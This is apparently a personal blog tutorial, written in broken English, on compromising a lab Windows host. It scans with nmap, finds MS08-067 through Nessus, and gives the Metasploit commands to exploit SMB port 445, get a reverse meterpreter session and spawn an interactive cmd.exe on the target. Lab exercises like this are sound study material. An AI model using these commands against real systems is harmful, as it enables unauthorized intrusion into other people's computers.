1. we scan ip address connect with we computer, for detected i used nmap to searching IP addres, if we used nmap write "nmap 192.168.56.0/24", and than we will get IP addres to attack, in here the IP is 192.168.56.10
2. find weakness the target with nessus, open the nessus, click scan --> add, will display likes under this, and than input the stuffing, and click launch scan
3. nessus will scan the IP target
4. and than click the name result, and will display likes under this
5. click IP address, and will display likes under this
6. find which port who has high column highest, because this have many loopholes to enter, in the number 5 port have many loopholes is port 445, click and will display likes under this
7. and i try who has the Severity "High", because "High" get loopholes to enter, click plugin id "34477"
8. i try exploit with loopholes "MS08-067", after get loopholes, it's time to open "msfconsole"
write the loopholes that we get last,
msf > use windows/smb/ms08_067_netapi (enter)
msf exploit(ms08_067_netapi) > set lhost 192.168.56.1 (enter)
msf exploit(ms08_067_netapi) > set rhost 192.168.56.10 (enter)
msf exploit(ms08_067_netapi) > exploit (enter)
if appear "meterpreter >", means we are already able to infiltrate into the computer target, to be more confident write command "execute -f cmd.exe -c -i" and enter,
ok, now we can exploit the computer target, for example i try to make new folder with command "mkdir sukses"
and the result
finish
Tidak ada komentar:
Posting Komentar